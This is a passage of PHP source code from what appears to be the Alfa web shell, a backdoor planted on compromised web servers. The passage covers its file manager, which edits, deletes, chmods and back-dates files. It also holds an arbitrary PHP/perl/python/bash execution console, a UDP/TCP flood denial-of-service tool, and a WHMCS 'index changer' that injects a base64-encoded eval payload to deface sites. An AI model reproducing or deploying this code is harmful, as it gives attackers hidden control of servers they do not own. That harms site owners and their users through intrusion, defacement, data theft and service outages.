			$dirs[] = array_merge($tmp, array('type' => 'dir'));
		}
	}
}
}
$GLOBALS['sort'] = $sort;
function alfaCmp($a, $b) {
if($GLOBALS['sort'][0] != 'size')
return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
else
return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
}
usort($files, "alfaCmp");
usort($dirs, "alfaCmp");
$files = array_merge($dirs, $files);
$l=0;
$cc=0;
foreach($files as $f){
$f['name'] = htmlspecialchars($f['name']);
$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];
$checkbox = 'checkbox'.$cc;
$raw_name = rawurlencode($f['name']);
$icon = $GLOBALS['DB_NAME']['show_icons']?'<img src="'.findicon($f['name'],$f['type']).'" width="30" height="30">':'';
$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';
echo '<tr'.($l?' class=l1':'').'><td><div class="myCheckbox"><input type="checkbox" name="f[]" value="'.$raw_name.'" class="chkbx" id="'.$checkbox .'"><label for="'.$checkbox .'"></label></div></td><td>'.$icon.'<div style="'.$style.'"><a class="main_name" href=javascript:void(0) onclick="'.(($f['type']=='file')?'editor(\''.$raw_name.'\',\'auto\',\'\',\'\',\'\',\''.$f['type'].'\');">'.($GLOBALS['cwd'].$f['name']==$GLOBALS['__file_path']?"<span class='shell_name' style='font-weight:unset;'>".$f['name']."</span>":htmlspecialchars($newname)):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>| ' . htmlspecialchars($f['name']) . ' |</b>').'</a></td></div><td><span style="font-weight:unset;" class="main_size">'.(($f['type']=='file')?alfaSize($f['size']):$f['type']).'</span></td><td><span style="font-weight:unset;" class="main_modify">'.$f['modify'].'</span></td><td><span style="font-weight:unset;" class="main_owner_group">'.$f['owner'].'/'.$f['group'].'</span></td><td><a href=javascript:void(0) onclick="editor(\''.$raw_name.'\',\'chmod\',\'\',\'\',\'\',\''.$f['type'].'\')">'.
$f['perms'].'</td><td><a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'rename\',\'\',\'\',\'\',\''.$f['type'].'\')">R</a> <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'touch\',\'\',\'\',\'\',\''.$f['type'].'\')">T</a>'.(($f['type']=='file')?' <a class="actions" href="javascript:void(0);" onclick="editor(\''.$raw_name.'\', \'edit\',\'\',\'\',\'\',\''.$f['type'].'\')">E</a> <a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$raw_name.'\', \'download\')">D</a>':'').'<a class="actions" href="javascript:void(0);" onclick="var chk = confirm(\'Are You Sure For Delete # '.addslashes(rawurldecode($f['name'])).' # ?\'); chk ? g(\'FilesMan\',null,\'delete\', \''.$raw_name.'\') : \'\';"> X </a></td></tr>';
$l = $l?0:1;
$cc++;
}
echo "<tr><td colspan=7>
<input type=hidden name=a value='FilesMan'>
<input type=hidden name=c value='".htmlspecialchars((isset($GLOBALS['glob_chdir_false'])?$_POST['c']:$GLOBALS['cwd']))."'>
<input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
<select id='tools_selector' name='alfa1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete' selected>Delete</option><option value='zip'>Add 2 Compress (zip)</option><option value='unzip'>Add 2 Uncompress (zip)</option><option value='paste'>Paste / Zip / Unzip </option></select>
<input type='submit' value=' '>
</form></table></div></div>";
alfafooter();
}
function alfaFilesTools(){
alfahead();
echo '<div class="filestools">';
if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);
$alfa1_decoded = $_POST['alfa1'];
$chdir_fals = false;
if(!@chdir($_POST['c'])){
	$chdir_fals = true;
	$_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];
	$alfa_canruncmd = _alfa_can_runCommand(true,true);
	if($alfa_canruncmd){
		$slashed_alfa1 = addslashes($_POST['alfa1']);
		$file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));
		$perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");
	}
}
if($_POST['alfa2'] == 'auto'){
if(is_array(@getimagesize($_POST['alfa1']))){
$_POST['alfa2'] = 'image';
}else{
	$_POST['alfa2'] = 'view';
	if($chdir_fals){
		if($alfa_canruncmd){
			$mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));
			$mimetype = $mime[1];
			if(!empty($mimetype)){
				if(strstr($mimetype, "image")){
					$_POST['alfa2'] = 'image';
				}
			}
		}
	}
}
}
if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}
if(@$_POST['alfa2'] == 'mkfile'){
$_POST['alfa1'] = trim($_POST['alfa1']);
if($chdir_fals&&$alfa_canruncmd){
	if(_alfa_is_writable($_POST["c"])){
		alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");
		$_POST['alfa2'] = "edit";
	}
}
if(!@file_exists($_POST['alfa1'])){
$fp = @fopen($_POST['alfa1'], 'w');
if($fp){
$_POST['alfa2'] = "edit";
fclose($fp);
}
}else{
$_POST['alfa2'] = "edit";
}
}
if(!_alfa_file_exists(@$_POST['alfa1'])){
echo __pre()."<center><p><div class=\"txtfont\"><font color='red'>!...FILE DOEST NOT EXITS...!</font></div></p></center></div><script>editor_error=false;removeHistory('".$_POST['alfa4']."');</script>";
alfaFooter();
return;
}
if($chdir_fals){
$filesize = $file_info[3];
$uid["name"] = $file_info[1];
$gid["name"] = $file_info[2];
$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);
}else{
$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';
$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';
if(!$uid&&!$gid){
$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';
$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';
}
$permcolor = alfaPermsColor($_POST['alfa1']);
$filesize = @filesize($_POST['alfa1']);
if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){
	if(_alfa_can_runCommand()){
		list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));
	}
}
}
echo '<span class="editor_file_info_vars">Name:</span> '.htmlspecialchars($alfa1_decoded).' <span class="editor_file_info_vars">Size:</span> '.alfaSize($filesize).' <span class="editor_file_info_vars">Permission:</span> '.$permcolor.' <span class="editor_file_info_vars">Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].' <span class="editor_file_info_vars">Directory:</span> '.str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']).'<br><br>';
if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';
if(!_alfa_is_dir($_POST['alfa1'])){
$m = array('View', 'Edit', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');
$ftype = "file";
}else{
$m = array('Chmod', 'Rename', 'Touch');
$ftype = "dir";
}
foreach($m as $v)
echo $v == 'Delete' ? '<a href="javascript:void(0);" onclick="var chk=confirm(\'Are You Sure For Delete This File ?\');chk?editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\'):\'\';"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a> ' : '<a href="javascript:void(0);" onclick="editor(\''.addslashes(!isset($rename_cache)?$_POST['alfa1']:$rename_cache).'\',\''.strtolower($v).'\',\'\',\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\')"><span class="editor_actions">'.((strtolower($v)==@$_POST['alfa2'])?'<b><span class="editor_actions"> '.$v.' </span> </b>':$v).' | </span></a>';
echo '<br><br>';
switch($_POST['alfa2']){
case 'view':
@chdir($_POST['c']);
echo '<div class="editor-view"><div class="view-content"><p><button style="border-radius:10px;" class="button" onClick="copyToClipboard(\'view_ml_content\');">copy to clipboard</button></p><pre class="ml1" id="view_ml_content">';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '</pre></div></div>';
break;
case 'highlight':
@chdir($_POST['c']);
if(@is_readable($_POST['alfa1'])){
echo '<div class="editor-view"><div class="view-content"><div class="ml1" style="background-color: #e1e1e1;color:black;">';
$code = @highlight_file($_POST['alfa1'],true);
echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div></div></div>';
}
break;
case 'delete':
@chdir($_POST['c']);
if(@is_writable($_POST['alfa1'])||isset($GLOBALS["glob_chdir_false"])){
$deleted = true;
if(!@unlink($_POST['alfa1'])){
	$deleted = false;
	if($alfa_canruncmd){
		if(_alfa_is_writable($_POST['alfa1'])){
			alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");
			$deleted = true;
		}
	}
}
if($deleted)echo 'File Deleted...<script>var elem = $("'.$_POST['alfa4'].'").parentNode;elem.parentNode.removeChild(elem);delete editor_files["'.$_POST['alfa4'].'"];</script>';else echo 'Error...';}
break;
case 'chmod':
@chdir($_POST['c']);
if(!empty($_POST['alfa3'])){
$perms = 0;
for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)
$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));
if(!@chmod($_POST['alfa1'], $perms)){
if($chdir_fals&&$alfa_canruncmd){
alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");
echo('Success!');
}else{
echo '<font color="#FFFFFF"><b>Can\'t set permissions!</b></font><br><script>document.mf.alfa3.value="";</script>';}
}else{echo('Success!');}
}
clearstatcache();
AlfaNum(8,9,10,7,6,5,4,2,1);
if($chdir_fals){
	$file_perm = $file_info[5];
}else{
	$file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);
}
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.chmod.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="chmod" value="'.$file_perm.'"><input type=submit value=" "></form>';
break;
case 'edit':
@chdir($_POST['c']);
if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){
echo 'File isn\'t writeable';
break;
}
if(!empty($_POST['alfa3'])){
$_POST['alfa3'] = substr($_POST['alfa3'],1);
$time = @filemtime($_POST['alfa1']);
$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);
if($chdir_fals&&$alfa_canruncmd){
	$rname = $alfa1_decoded;
	$randname = $rname.rand(111,9999);
	$filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;
	if($fp = @__write_file($filepath ,$_POST['alfa3'])){
		alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");
	}
}
if($fp){
echo 'Saved!<br><script>alfa3_="";</script>';
@touch($_POST['alfa1'],$time,$time);
}
}
echo '<button class="button" style="border-radius:10px;" onClick="copyToClipboard(\'edit_textarea_content\');">copy to clipboard</button><form id="editor_edit_area" onsubmit="editor(\''.addslashes($alfa1_decoded).'\',\''.$_POST['alfa2'].'\',\'1\'+this.text.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><p><input type="submit" value=" "></p><textarea name="text" id="edit_textarea_content" class="bigarea" onkeydown="saveByKey(event);">';
echo htmlspecialchars(__read_file($_POST['alfa1']));
echo '</textarea><p><input type="submit" value=" "></p></form>';
break;
case 'hexdump':
@chdir($_POST['c']);
$c = __read_file($_POST['alfa1']);
$n = 0;
$h = array('00000000<br>','','');
$len = strlen($c);
for ($i=0; $i<$len; ++$i) {
$h[1] .= sprintf('%02X',ord($c[$i])).' ';
switch ( ord($c[$i]) ) {
case 0: $h[2] .= ' '; break;
case 9: $h[2] .= ' '; break;
case 10: $h[2] .= ' '; break;
case 13: $h[2] .= ' '; break;
default: $h[2] .= $c[$i]; break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
$h[1] .= '<br>';
$h[2] .= "\n";
}
}
echo '<div class="editor-view"><div class="view-content"><table cellspacing=1 cellpadding=5 bgcolor=black><tr><td bgcolor=gray><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table></div></div>';
break;
case 'rename':
@chdir($_POST['c']);
$alfa1_escape = addslashes($_POST["alfa1"]);
$alfa3_escape = addslashes($_POST["alfa3"]);
if(!empty($_POST['alfa3'])){
$cmd_rename = false;
if($chdir_fals&&$alfa_canruncmd){
if(_alfa_is_writable($_POST['alfa1'])){
$alfa1_escape = addslashes($alfa1_decoded);
alfaEx("cd '".addslashes($_POST['c'])."';mv '".$alfa1_escape."' '".addslashes($_POST['alfa3'])."'");
}else{
$cmd_rename = true;
}
}else{
$alfa1_escape = addslashes($_POST["alfa1"]);
}
if(!@rename($_POST['alfa1'], $_POST['alfa3'])&&$cmd_rename){
echo 'Can\'t rename!<br>';}else{echo('Renamed!<script>try{$("'.$_POST['alfa4'].'").innerHTML = "<div class=\'editor-icon\'>"+loadType(\''.$alfa3_escape.'\',\''.$ftype.'\',\''.$_POST['alfa4'].'\')+"</div><div class=\'editor-file-name\'>'.$alfa3_escape.'</div>";editor_files["'.$_POST['alfa4'].'"].file = "'.$alfa3_escape.'";d.files.innerHTML = d.files.innerHTML.replace(/\\\''.$alfa1_escape.'\\\'/g, "\''.$alfa3_escape.'\'");d.files.innerHTML = d.files.innerHTML.replace(/value\=\"'.$alfa1_escape.'\"/, \'value\=\"'.$alfa3_escape.'\"\');d.files.innerHTML = d.files.innerHTML.replace(/'.$alfa1_escape.'\<\/a\>/g, "'.$alfa3_escape.'</a>");d.files.innerHTML = d.files.innerHTML.replace(/Are You Sure For Delete # '.$alfa1_escape.' # \?/, "Are You Sure For Delete # '.$alfa3_escape.' # ?");'.($ftype == "dir"?"updateDirsEditor('".$_POST['alfa4']."','".$alfa1_escape."');":"").'}catch(e){console.log(e)}</script>');$alfa1_escape = $alfa3_escape;}
}
echo '<form onsubmit="editor(\''.$alfa1_escape.'\',\''.$_POST['alfa2'].'\',this.name.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type="text" name="name" value="'.addslashes(htmlspecialchars(isset($_POST['alfa3'])&&$_POST['alfa3']!=''?$_POST['alfa3']:$alfa1_decoded)).'"><input type=submit value=" "></form>';
break;
case 'touch':
@chdir($_POST['c']);
if( !empty($_POST['alfa3']) ) {
$time = strtotime($_POST['alfa3']);
if($time){
$touched = false;
if($chdir_fals&&$alfa_canruncmd){
	alfaEx("cd '".addslashes($_POST["c"])."';touch -d '".htmlspecialchars(addslashes($_POST['alfa3']))."' '".addslashes($alfa1_decoded)."'");
	$touched = true;
}
if(!@touch($_POST['alfa1'],$time,$time)&&!$touched)
echo 'Fail!';
else
echo 'Touched!';
} else echo 'Bad time format!';
}
clearstatcache();
echo '<script>alfa3_="";</script><form onsubmit="editor(\''.addslashes($_POST['alfa1']).'\',\''.$_POST['alfa2'].'\',this.touch.value,\''.$_POST['c'].'\',\''.$_POST['alfa4'].'\',\''.$ftype.'\');return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST['alfa1']))).'"><input type=submit value=" "></form>';
break;
case 'image':
@chdir($_POST['c']);
echo('<hr>');
$file = $_POST['alfa1'];
$image_info = @getimagesize($file);
if(is_array($image_info)||$chdir_fals){
$width = (int)$image_info[0];
$height = (int)$image_info[1];
if($chdir_fals&&$alfa_canruncmd){
	$source = alfaEx("cat '".addslashes($file)."' | base64");
	list($width, $height) = explode(":", alfaEx("identify -format '%w:%h' '".addslashes($file)."'"));
	$mime = explode(":", alfaEx("file --mime-type '".addslashes($file)."'"));
	$image_info['mime'] = $mime[1];
}else{
	$source = __ZW5jb2Rlcg(__read_file($file, false));
}
$image_info_h = "Image type = <span>[</span> ".$image_info['mime']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";
if($width > 800){$width = 800;}
echo $content = "<div class='editor-view'><div class='view-content'><center>".$image_info_h."<br><img id='viewImage' style='max-width:100%;border:1px solid green;' src='data:".$image_info['mime'].";base64,".$source."' alt='".$file."'></center></div></div><br>";
}
break;
}
echo '</div>';
alfaFooter();
}
function findicon($file,$type){
$s = 'http://solevisible.com/icons/';
$types = array('json','ppt','pptx','xls','xlsx','msi','config','cgi','pm','c','cpp','cs','java','aspx','asp','db','ttf','eot','woff','woff2','woff','conf','log','apk','cab','bz2','tgz','dmg','izo','jar','7z','iso','rar','bat','sh','alfa','gz','tar','php','php4','php5','phtml','html','xhtml','shtml','htm','zip','png','jpg','jpeg','gif','bmp','ico','txt','js','rb','py','xml','css','sql','htaccess','pl','ini','dll','exe','mp3','mp4','m4a','mov','flv','swf','mkv','avi','wmv','mpg','mpeg','dat','pdf','3gp','doc','docx','docm');
if($type!='file'){
return ($file=='..'?$s.'back.png':$s.'folder.png');
}else{
$ext = explode('.',$file);
$ext = end($ext);
$ext = strtolower($ext);
return (in_array($ext,$types)?$s.$ext.'.png':$s.'notfound.png');
}
}
function alfadlfile(){
if(isset($_POST['c'],$_POST['file'])){
$basename = rawurldecode(basename($_POST['file']));
$_POST['file'] = str_replace("//", "/", $_POST['c'].'/'.$basename);
$alfa_canruncmd = _alfa_can_runCommand(true,true);
if(@is_file($_POST['file']) && @is_readable($_POST['file']) || $alfa_canruncmd){
ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment; filename=\"".addslashes($basename)."\"");
header("Content-Type: application/octet-stream");
if(isset($GLOBALS["glob_chdir_false"])){
	$randname = $basename.rand(111,9999);
	$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);
	$filepath = $scriptpath."/".$randname;
	if(_alfa_is_writable($scriptpath)){
		alfaEx("cp '".addslashes($_POST["file"])."' '".addslashes($filepath)."'");
		readfile($filepath);
		@unlink($filepath);
	}else{
		alfaEx("cat '".addslashes($_POST["file"])."'");
	}
}else{
	readfile($_POST['file']);
}
}else echo('Error...!');}}
function alfaphpeval(){
alfahead();
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'ini')){
echo '<div class=header>';
ob_start();
$INI=ini_get_all();
print '<table border=0><tr>'
.'<td class="listing"><font class="highlight_txt">Param</td>'
.'<td class="listing"><font class="highlight_txt">Global value</td>'
.'<td class="listing"><font class="highlight_txt">Local Value</td>'
.'<td class="listing"><font class="highlight_txt">Access</td></tr>';
foreach ($INI as $param => $values)
print "\n".'<tr>'
.'<td class="listing"><b>'.$param.'</td>'
.'<td class="listing">'.$values['global_value'].' </td>'
.'<td class="listing">'.$values['local_value'].' </td>'
.'<td class="listing">'.$values['access'].' </td></tr>';
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'info')) {
echo '<div class=header><style>.p {color:#000;}</style>';
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
echo str_replace('<h1','<h2', $tmp) .'</div><br>';
}
if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'exten')) {
echo '<div class=header>';
ob_start();
$EXT=get_loaded_extensions();
echo '<table border=0><tr><td class="listing">'.implode('</td></tr>'."\n".'<tr><td class="listing">', $EXT).'</td></tr></table>'.count($EXT).' extensions loaded';
echo '</div><br>';
}
$lang_html = "";
foreach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= '<option value="'.$key.'" '.($_POST["alfa3"]==$key?"selected":"").'>'.$val.'</option>';}
echo '<div class=header><Center><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'ini\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'info\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\'phpeval\',null,\'\',\'exten\')"> | extensions |</a></center><br><form name=pf method=post onsubmit="g(\'phpeval\',null,this.code.value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">'.$lang_html.'</select><br><br><textarea placeholder="file_get_contents(\'/etc/passwd\');" name=code class=bigarea id=PhpCode>'.(!empty($_POST['alfa1'])?htmlspecialchars($_POST['alfa1']):'').'</textarea><center><input type="submit" value="" style="margin-top:5px"></center>';
echo '</form><pre id=PhpOutput style="'.(empty($_POST['alfa1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
if(!empty($_POST['alfa1'])){
if($_POST['alfa3']=="php"){
ob_start();
eval($_POST['alfa1']);
$result = htmlspecialchars(ob_get_clean());
}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){
	if(isset($_SESSION["eval_tmpdir"])){
		$tempdir = $_SESSION["eval_tmpdir"];
	}else{
		$tempdir = dirname(alfaEx("mktemp"));
		$_SESSION["eval_tmpdir"] = $tempdir;
	}
	$lang = $_POST['alfa3'];
	$filename = "temp".rand(11111,99999);
	$temp = $tempdir."/".$filename ;
	__write_file($filename, $_POST['alfa1']);
	$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");
	@unlink($filename);
	@unlink($temp);
}
echo '<textarea class=bigarea id="PhpCode">'.$result.'</textarea>';
}
echo '</pre></div>';
alfafooter();
}
function alfahash(){
if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
$stringTools = array(
'Base64_encode ( $string )' => '__ZW5jb2Rlcg($s)',
'Base64_decode ( $string )' => '__ZGVjb2Rlcg($s)',
'strrev ( $string )' => 'strrev($s)',
'bin2hex ( $string )' => 'bin2hex($s)',
'hex2bin ( $string )' => 'hex2bin($s)',
'md5 ( $string )' => 'md5($s)',
'sha1 ( $string )' => 'sha1($s)',
'hash ( "sha251", $string ) --> sha251' => 'hash("sha256",$s)',
'hash ( "sha384", $string ) --> sha384' => 'hash("sha384",$s)',
'hash ( "sha512", $string ) --> sha512' => 'hash("sha512",$s)',
'crypt ( $string )' => 'crypt($s)',
'crc32 ( $string )' => 'crc32($s)',
'str_rot13 ( $string )' => 'str_rot13($s)',
'urlencode ( $string )' => 'urlencode($s)',
'urldecode  ( $string )' => 'urldecode($s)',
'full_urlencode  ( $string )' => 'full_urlencode($s)',
'htmlspecialchars  ( $string )' => 'htmlspecialchars($s)',
'base64_encode (gzdeflate( $string , 9)) --> Encode' => '__ZW5jb2Rlcg(gzdeflate($s, 9))',
'gzinflate (base64_decode( $string )) --> Decode' => '@gzinflate(__ZGVjb2Rlcg($s))',
'str_rot13 (base64_encode( $string )) --> Encode' => 'str_rot13(__ZW5jb2Rlcg($s))',
'base64_decode (str_rot13( $string )) --> Decode' => '__ZGVjb2Rlcg(str_rot13($s))',
'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode' => 'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))',
'gzinflate (base64_decode(str_rot13( $string ))) --> Decode' => '@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))',
);
alfahead();
echo '<div class=header>';
echo "<form onSubmit='g(\"hash\",null,this.selectTool.value,this.input.value);return false;'><div class='txtfont'>Method:</div> <select name='selectTool' style='width:400px;'>";
foreach($stringTools as $k => $v)
echo "<option value='".htmlspecialchars($v)."' ".($_POST['alfa1']==$v?'selected':'').">".$k."</option>";
echo "</select> <input type='submit' value=' '/><br><textarea  name='input' style='margin-top:5px' class='bigarea'>".(empty($_POST['alfa1'])?'':htmlspecialchars(@$_POST['alfa2']))."</textarea></form>";
if(!empty($_POST['alfa1'])){
$string = addslashes($_POST['alfa2']);
$string = str_replace('\"','"',$string);
$alg = $_POST['alfa1'];
$code = str_replace('$s',"'".$string."'",$alg);
ob_start();
eval('echo '.$code.';');
$res = ob_get_contents();
ob_end_clean();
if(in_array($alg, $stringTools))echo '<textarea class="bigarea" id="PhpCode">'.htmlspecialchars($res).'</textarea>';
}
echo "</div>";
alfaFooter();
}
function alfados(){
alfahead();
echo '<div class=header>';
echo '<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\'dos\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>';
if(!empty($_POST['alfa1']) && !empty($_POST['alfa2']) && !empty($_POST['alfa3'])){
echo __pre();
$packets=0;
ignore_user_abort(true);
$exec_time=(int)$_POST['alfa2'];
$time=time();
$max_time=$exec_time+$time;
$host=$_POST['alfa1'];
$port=(int)$_POST['alfa3'];
$method=$_POST['alfa4'];
$out = str_repeat('X',65000);
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = @fsockopen($method.'://'.$host, $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";
echo "</pre>";
}
echo '</div>';
alfafooter();
}
function __pre(){return('<pre id="strOutput" style="margin-top:5px" class="ml1">');}
function alfaIndexChanger(){
alfahead();

echo '<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,null,\'whmcs\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,\'vb\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\'IndexChanger\',null,null,\'mybb\')">| MyBB | </a></h3></center>';
if(isset($_POST['alfa3'])&&($_POST['alfa3'] == 'whmcs')){
echo __pre();

echo "<center><center><div class='txtfont_header'>| Whmcs |</div>
<p><center>".getConfigHtml('whmcs')."<form onSubmit=\"g('IndexChanger',null,null,null,'whmcs',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\">
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'URL', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'File Name', 'inputName' => 'fname', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td6' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo "<br><div class='txtfont'>| Your Index |</div><br>
<textarea name=index rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
<input type='submit' value=' '>
</form></center></center>";
if(isset($_POST['alfa6'])){
$s0levisible="Powered By Solevisible";
$dbu = $_POST['alfa6'];
$path = $_POST['alfa5'];
$fname = $_POST['alfa4'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$index = $_POST['alfa10'];
$index = str_replace("\'","'",$index);
$deface = '$x = base64_decode("'.__ZW5jb2Rlcg($index).'"); $solevisible = fopen("'.$fname.'","w"); fwrite($solevisible,$x);';
$saveData = __ZW5jb2Rlcg($deface);
$Def = '{php}eval(base64_decode("'.$saveData.'"));{/php}';
if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
